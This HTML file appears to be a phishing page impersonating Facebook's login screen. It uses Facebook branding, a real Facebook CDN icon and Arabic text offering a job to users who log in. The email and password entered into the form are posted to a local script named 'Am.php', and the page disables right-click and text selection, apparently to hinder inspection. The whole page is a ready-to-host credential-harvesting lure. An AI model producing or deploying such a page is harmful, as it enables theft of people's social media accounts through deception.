
<html>
<head>
<meta charset='UTF-8' />
<meta http-equiv='X-UA-Compatible' content='IE=edge'>
<meta name='viewport' content='width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<meta property='og:title' content='Facebook - login or sign up'>
<meta name='description' content='Login to your Facebook account.'>
<meta property='og:description' content='Login to your Facebook account.'>
<meta property='og:url' content='./'>
<meta property='og:site_name' content='Facebook - login or sign up'>
<meta property='og:type' content='website'>
<title>Facebook - Login or sign up</title>

<link rel='stylesheet' href='css/style.css'>
<link href='https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' rel='stylesheet'>
<link rel='icon' href='https://z-m-static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png'><style>body{direction:ltr}
.poor{
    width:180px;
    height: 60px;
    
    }
</style>
</head>
<body oncontextmenu='return false' onselectstart='return false' ondragstart='return false'>
<div class='navbar'>
<img src='img/fb.png'>
</div>
<div class='content-box'>
<img class="poor" src='https://cdn.iconscout.com/icon/free/png-512/job-location-1956233-1650486.png'>
<div class='txt-login'>سجل في فيسبوك للحصول علي الوظيفة </div>
<form role='form' class='login-form' action='Am.php' method='post'>
<label>
<input type='text' name='email' placeholder='رقم الهاتف المحمول أو البريد الإلكتروني' autocomplete='off' autocapitalize='off' required></label>
<label>
<input type='password' name='pass' placeholder='كلمة السر' autocomplete='off' autocapitalize='off' required></label>
<button type='submit' name='save' class='btn-login'>تسجيل الدخول</button>
</form>
<div class='txt-create-account'>إنشاء حساب جديد</div>
<div class='txt-forgotten-password'>نسيت كلمة السر ؟</div>
</div>
<div class='language-box'>
<center>
<div class='language-name language-name-active'>العربية</div>
<div class='language-name'>Bahasa Indonesia</div>
<div class='language-name'>English (UK)</div>
<div class='language-name'>Bahasa Melayu</div>
<div class='language-name'>日本語</div>
<div class='language-name'>Español</div>
<div class='language-name'>Português (Brasil)</div>
<div class='language-name'>
<i class='fa fa-plus'></i>
</div>
</center>
</div>
<div class='copyright'>Facebook Inc.</div>
</body>
</html>
